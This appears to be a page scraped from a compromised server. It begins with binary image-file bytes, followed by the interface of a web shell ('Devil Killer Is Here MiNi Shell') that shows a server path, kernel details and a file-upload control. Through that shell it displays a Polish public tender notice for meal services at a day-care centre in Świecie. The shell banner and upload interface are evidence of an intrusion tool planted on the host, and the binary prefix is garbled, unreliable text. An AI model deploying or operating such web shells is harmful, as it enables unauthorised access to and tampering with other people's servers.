JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250617/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250617/0028302801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie usług wyżywienia dla uczestników Dziennego Domu Pomocy przy <br/>ul. Królowej Bony 2 w Świeciu” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Pomocy Społecznej w Świeciu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 090077277</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Generała Józefa Hallera 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świecie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">525190540</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@opsswiecie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://opsswiecie.pl/ oraz https://opsswiecie.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostki organizacyjne administracji samorządowej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie usług wyżywienia dla uczestników Dziennego Domu Pomocy przy <br/>ul. Królowej Bony 2 w Świeciu” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-62e8a19f-133b-4791-b399-fcb8a7ea769b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00283028</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00032396/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 „Świadczenie usług wyżywienia dla uczestników Dziennego Domu Pomocy przy ul. Królowej Bony 2 w Świeciu”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ops_swiecie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się za pomocą środków komunikacji elektronicznej. Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej za pośrednictwem narzędzia platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/ops_swiecie i formularza „Wyślij wiadomość do Zamawiającego” dostępnego na stronie dotyczącej danego postępowania (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 11 ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020<br/>r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu<br/>o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) określa niezbędne<br/>wymagania sprzętowo – aplikacyjne umożliwiające na Platformie, tj.:<br/>a. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b. komputer klasy PC lub MAC o następującej konfiguracji: pamięć RAM min. 2 GB, procesor Intel<br/>IV 2 GHz lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac OS x<br/>10.4, Linux, lub ich nowsze wersje,<br/>c. zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d. włączona obsługa JavaScript,<br/>e. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f. szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.,<br/>g. oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>6. Wykonawca może zwrócić się do Zamawiającego z pisemną prośbą o wyjaśnienie treści SWZ za<br/>pośrednictwem Platformy i formularza „Wyślij wiadomość do Zamawiającego” dostępnego na<br/>stronie dotyczącej danego postępowania.<br/>7. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem Platformy.<br/>8. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości<br/>bezpośrednio na Platformie przesłanych przez Zamawiającego, gdyż system powiadomień może<br/>ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>9. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z instrukcją<br/>korzystania z Platformy, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty<br/>przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do<br/>zamawiającego”) .<br/>10. Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod<br/>uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony<br/>w art. 221. ustawy Pzp.<br/>11. Wszelką korespondencję związaną z niniejszym postępowaniem należy przekazywać za<br/>pośrednictwem Platformyzakupowej.pl. Korespondencję uważa się za przekazaną w terminie,<br/>jeżeli dotrze do Zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie<br/>drugiej niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>12. Instrukcja korzystania z Platformy Zakupowej przez Wykonawców jest dostępna<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/>14. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający<br/>i Wykonawcy posługują się numerem postępowania określonym przez Zamawiającego na pierwszej stronie SWZ ZP.271.5.2025.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Ośrodek Pomocy Społecznej ul. Gen. Józefa<br/>Hallera 11, 86-100 Świecie, e-mail: sekretariat@opsswiecie.pl, tel. 52 519 05 40.<br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem<br/>Ochrony Danych pod adresem e-mail: iod@opsswiecie.pl.<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego, nr postępowania ZP.271.5.2025.<br/>4. Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11<br/>września 2019 r.– Prawo zamówień publicznych (t.j. Dz. U. z 2023 r. poz. 1605), zwanej dalej PZP,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku<br/>z przepisami PZP.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 4 PZP.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych<br/>danych wynikają z PZP.<br/>8. Osoba, której dane dotyczą ma prawo do:<br/>- dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia<br/>przetwarzania,<br/>- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy<br/>prawo wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul.<br/>Stawki 2, 00-193 Warszawa,<br/>9. Osobie, której dane dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>- na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych.<br/>10.W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia,<br/>wymagałoby niewspółmiernie dużego wysiłku, Administrator może żądać od osoby, której dane<br/>dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania,<br/>w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia<br/>danych osobowych, o którym mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy<br/>w zakresie niezgodnym z PZP.<br/>12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień<br/>Publicznych, prawa, o których mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Administratora.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku, gdy wniesienie<br/>żądania, o którym mowa w art. 18 ust. 1 Rozporządzenia, spowoduje ograniczenie przetwarzania<br/>danych osobowych zawartych w protokole i załącznikach do protokołu, Administrator nie<br/>udostępnia tych danych zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą<br/>przesłanki, o których mowa w art. 18 ust. 2 Rozporządzenia.<br/>15. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia,<br/>o którym mowa w art. 16 Rozporządzenia, nie może naruszać integralności protokołu oraz jego<br/>załączników.<br/>16. Ponadto informujemy, iż w związku z przetwarzaniem Pani/Pana danych osobowych nie podlega<br/>Pan/Pani decyzjom, które się opierają wyłącznie na zautomatyzowanym przetwarzaniu, w tym profilowaniu, o czym stanowi art. 22 Rozporządzenia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usługi wyżywienia dla uczestników Dziennego Domu<br/>Pomocy przy ul. Królowej Bony 2 w Świeciu.<br/>2. Zakres zamówienia obejmuje:<br/>1) Zapewnienie przez Wykonawcę przygotowania, ugotowania i dostarczenia wyżywienia dla<br/>uczestników Dziennego Domu Pomocy przy ul. Królowej Bony 2 w Świeciu, obejmującego: śniadanie<br/>wraz z napojem oraz obiadu: 2 razy w tygodniu tj. wtorki i czwartki I danie z pieczywem, 3 razy<br/>w tygodniu: poniedziałki, środy i piątki II danie wraz z napojem.<br/>2) Świadczenie usługi wyżywienia obejmuje grupę ok. 30 osób/miesięcznie przez okres od<br/>14.07.2025r. do 30.06.2026r. (tj. 242 dni roboczych).<br/>3) Zamawiający przewiduje wielkość przedmiotu zamówienia w okresie trwania umowy na:<br/>około 7260 gorących zestawów posiłków (przez zestaw posiłków rozumie się zestaw złożony ze<br/>śniadania wraz z napojem oraz obiad składający się z I dania z pieczywem lub II dania wraz<br/>z napojem). tj. wyżywienie dla około 30 osób przez 242 dni roboczych.<br/>4) Z tytułu ewentualnego zmniejszenia wielkości zamówienia Zamawiający nie ponosi żadnych<br/>konsekwencji.<br/>5) Ostateczna ilość zestawów posiłków może ulec zmianie, w zależności od faktycznej liczby<br/>wydanych decyzji. Przewidywana liczba osób może ulec zmniejszeniu. Zamawiający poda<br/>telefonicznie dokładną liczbę posiłków osób korzystających z usługi wyżywienia w danym dniu do<br/>wspólnie ustalonej godziny.<br/>6) Zestawy Posiłków należy dostarczyć do Dziennego Domu Pomocy przy ul. Królowej Bony 2<br/>w Świeciu:<br/>− godzina dostarczenia śniadania 8:00 - 8:30,<br/>− godzina dostarczenia obiadu 12:00 - 12:30.<br/>7) Wykonawcy będzie przysługiwał zwrot kosztu za wyżywienie dla uczestników wyłącznie za<br/>faktycznie wydaną ilość zestawów posiłków, zgodnie ze wzorem obliczania wartości zamówienia.<br/>8) Zestaw posiłków tj. Wyżywienie dla 1 uczestnika Dziennego Domu Pomocy za 1 dzień w danym<br/>dniu obejmuje:<br/>a) Śniadanie – przykładowe menu: kawa, kawa zbożowa, kakao, herbata z cytryną, mleko,<br/>pieczywo mieszane, wędlina, ser, pasty, masło, jogurt, jajka, powidła, dżem, dodatek<br/>warzywny (np. pomidor, ogórek, rzodkiewka, papryka, sałata i inne) itp.,<br/>b) I danie obiadowe – zupa na wywarze mięsnym lub warzywnym z wkładką (w postaci mięsa<br/>lub wędliny) z pieczywem. Przykładowe menu: zupa kalafiorowa, szczawiowa, serowa, rosół<br/>z makaronem, jarzynowa, pomidorowa z ryżem lub makaronem, barszcz ukraiński, żurek,<br/>pieczarkowa, ogórkowa, klopsowa, krem z dyni itp. Wędliny stanowiące wkładkę do zupy –<br/>wysokiej jakości parówki i kiełbasy zawierające min 90% mięsa. Pieczywo – chleb, bułki.<br/>c) II danie obiadowe – przykładowe menu: danie mięsne lub rybne w zestawie z ziemniakami<br/>lub z zamiennikiem: kaszą lub ryżem lub makaronem, a także surówki; lub danie warzywne,<br/>zapiekanki, pierogi, pyzy, kopytka, naleśniki, itp. – dodatkowo kompot lub sok lub woda, napój owocowy, herbata itp.<br/>9) Produkty wykorzystywane do tzw. „obkładu” – tzn. układane na pieczywie (np. szynka, kiełbasa,<br/>ser żółty itp.) oraz pieczywo, z wyłączeniem bułek, muszą być pokrojone.<br/>10) Wykonawca w ramach świadczenia usługi, tzw. &#34;suchego magazynu&#34;zgodnie ze zgłoszonym przez Kierownika Dziennego<br/>Domu Pomocy zapotrzebowaniem może dostarczyć produkty spożywcze takie jak:<br/>− Kawa parzona, kawa rozpuszczalna, herbata czarna, herbata owocowa (różne smaki), mleko<br/>woda mineralna, soki owocowe i /lub warzywne, jogurty owocowe, margarynę do smarowania.<br/>11) Wykonawca zastosuje zamienniki dla osób, które cierpią na alergię lub nie jedzą ryb, jajek, sera<br/>żółtego, wędliny, drobiu, mięsa itp., po uprzednim uzgodnieniu szczegółów z Zamawiającym.<br/>Dodatkowo po zgłoszeniu przez Zamawiającego Wykonawca jest zobowiązany do dostosowania<br/>posiłków do niezbędnych wymagań dietetycznych takich jak np.:<br/>− Dieta lekkostrawna, dieta cukrzycowa, dieta wątrobowa, dieta indywidualna zgodnie<br/>z zaleceniami lekarza/dietetyka.<br/>12) Jadłospis, zawierający informację na temat wartości kalorycznej posiłków oraz składowych<br/>poszczególnych potraw z wyszczególnionymi alergenami układany ma być przez Wykonawcę na<br/>okres 1 tygodnia (od poniedziałku do piątku) i zatwierdzany przez osobę posiadającą uprawnienia<br/>dietetyka żywienia. Jadłospis będzie dostarczany w wersji drukowanej lub elektronicznej<br/>Zamawiającemu najpóźniej 3 dni robocze przed okresem jego obowiązywania do Kierownika<br/>Mieszkań Wspomaganych i Dziennego Domu Pomocy.<br/>13) Wykonawca zobowiązuje się przygotować posiłki z produktów zakupionych we własnym<br/>zakresie. Posiłki powinny być lekkostrawne, przygotowywane z surowców wysokiej jakości,<br/>świeżych, naturalnych, mało przetworzonych, z ograniczoną ilością substancji dodatkowych,<br/>konserwujących, zagęszczających, barwiących lub sztucznie aromatyzowanych.<br/>14) Posiłki nie mogą być przygotowywane z półproduktów.<br/>15) Wykonawca zobowiązuje się do wykonania usługi żywienia zbiorowego zgodnie<br/>z obowiązującymi w tym zakresie normami, a polegającej na przygotowaniu, wydaniu posiłku<br/>o odpowiednio zbilansowanej wartości kalorycznej i odżywczej, zgodnie z zasadami racjonalnego<br/>żywienia na podstawie przepisów ustawy z dnia 25 sierpnia 2006 r. (t.j. Dz. U. z 2023 roku poz.<br/>1448) o bezpieczeństwie żywności i żywienia.<br/>16) Wykonawca zapewni, iż przygotowanie i dostarczenie posiłków będzie odbywało się<br/>z poszanowaniem obowiązujących w tym zakresie przepisów prawa, w szczególności dotyczących<br/>wymogów sanitarnych przy realizacji usługi wyżywienia (m.in. utrzymania odpowiedniej<br/>temperatury posiłków, przewozu w przystosowanych do tego celu termosach/pojemnikach,<br/>pojazdu dostosowanego do przewozu żywności).<br/>17) Wykonawca zobowiązany jest do przedkładania rachunku lub faktury za wykonaną usługę do<br/>5-go dnia roboczego każdego miesiąca – następującego po miesiącu, w którym wykonana została<br/>usługa z wyjątkiem miesiąca grudnia 2025 roku oraz miesiąca czerwca 2026 roku: Wykonawca<br/>zobowiązuje się do przedłożenia rachunku lub faktury za wykonaną usługę odpowiednio do<br/>22 grudnia 2025 roku oraz do 26 czerwca 2026r. Załącznikiem do faktury będzie zestawienie<br/>liczbowe posiłków dowiezionych do Dziennego Domu Pomocy w danym miesiącu.<br/>18) Wykonanie zadania przez Wykonawcę podlegać będzie kontroli ze strony Zamawiającego<br/>w zakresie prawidłowości wykonania zadania w tym:<br/>Nr postępowania: ZP.271.5.2025<br/>Strona 7 z 32<br/>− formy i warunków przygotowywania posiłków (gotowania),<br/>− jakości i różnorodności posiłków, walorów smakowych, estetyki i zgodności z jadłospisem,<br/>− prawidłowego rozliczenia wydawanych posiłków, zgodnie z zawartą umową a w szczególności do<br/>sposobu prowadzenia dokumentacji niezbędnej do rozliczania gorących posiłków (zestawienie<br/>liczbowe zamówionych posiłków w danym miesiącu, stanowiące załącznik nr 1 do wzoru umowy).<br/>− realizacji zamówienia w oparciu o przepisy ustawy o bezpieczeństwie żywności i żywienia<br/>w szczególności z zachowaniem zasad systemu analizy zagrożeń i krytycznych punktów kontroli<br/>(HACCP).<br/>19) W zakresie kontroli, Zamawiający:<br/>− będzie degustował wydawane posiłki oraz sprawdzał przestrzeganie zasad higieny przy<br/>sporządzaniu i dostawie posiłków,<br/>− będzie przeprowadzał ankiety i inne wywiady z osobami korzystającymi z posiłków,<br/>− sporządzi końcowy protokół z wizytacji, w którym Zamawiający dokona podsumowania poziomu<br/>i zakresu świadczonego przez Wykonawcę wyżywienia dla uczestników Dziennego Domu Pomocy.<br/>19) Wykonawca na każde żądanie Zamawiającego zobowiązany jest do przygotowania<br/>dodatkowego zestawu posiłków do wglądu i kontroli Zamawiającego. Wykonawca zostanie<br/>poinformowany o kontroli z 1 dniowym wyprzedzeniem przez Zamawiającego. Ponadto<br/>przedstawiciel Zamawiającego ma prawo kontrolować w każdej chwili rodzaj i jakość produktów,<br/>z których będą sporządzane posiłki, a także przestrzeganie przez Wykonawcę i jego pracowników<br/>wymogów wynikających z Umowy, SWZ oraz z przepisów dotyczących produkcji i jakości<br/>świadczonych usług. Zakwestionowane przez przedstawiciela Zamawiającego posiłki pod<br/>względem ilości i jakości podlegać będą wymianie na koszt Wykonawcy.<br/>20) Jeśli Wykonawca nie dostarczy posiłków spełniających wyżej wymienione kryteria zostanie obciążony kosztami zamówienia posiłków u innego usługodawcy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <p class="mb-0">55521200-0 - Usługi dowożenia posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-07-14 do 